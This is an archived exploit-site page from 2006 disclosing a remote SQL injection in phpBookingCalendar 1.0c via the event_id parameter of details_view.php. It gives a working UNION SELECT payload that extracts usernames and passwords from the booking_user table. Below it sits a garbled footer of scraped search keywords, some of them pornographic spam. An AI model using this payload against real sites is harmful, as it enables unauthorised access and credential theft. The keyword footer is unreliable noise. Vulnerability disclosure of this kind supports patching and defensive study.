about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection



2006-03-25 phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection
Rated as : High Risk

PoC by undefined1_ @ bash-x.net/undef/

phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html

phpBookingCalendar is prone to a sql injection attack. the sql injection
works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select
1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
securitydot.net - 2006-03-25

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 20:04:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
phpbb 2.0. _SERVER%5B Www.Simran WTSE FEERSEXCIL i search t www.feifan www.arefi. BOOLYWOOD- www.labacu incestsite www.sxmlgg photo sexs Kushbo sex Php Blue D Corel 200 /compo girls+sex+ maxcpm.inf ponographi Php Blue D www.88gs.c Corel nudity.com free porn 200 /compo family gay news for c WWW.AQNESM DBS kuw2008.cn desipapa&a www.boda40 piss clips WWW.PLEY B www.gdszpw sexpicture sexygrial Indonesa v news for c www.gdszpw local root cardmax nake girls WWW.PLAY B sexey shay www.cneues Www.Sexcom www.arab s AppServ+Op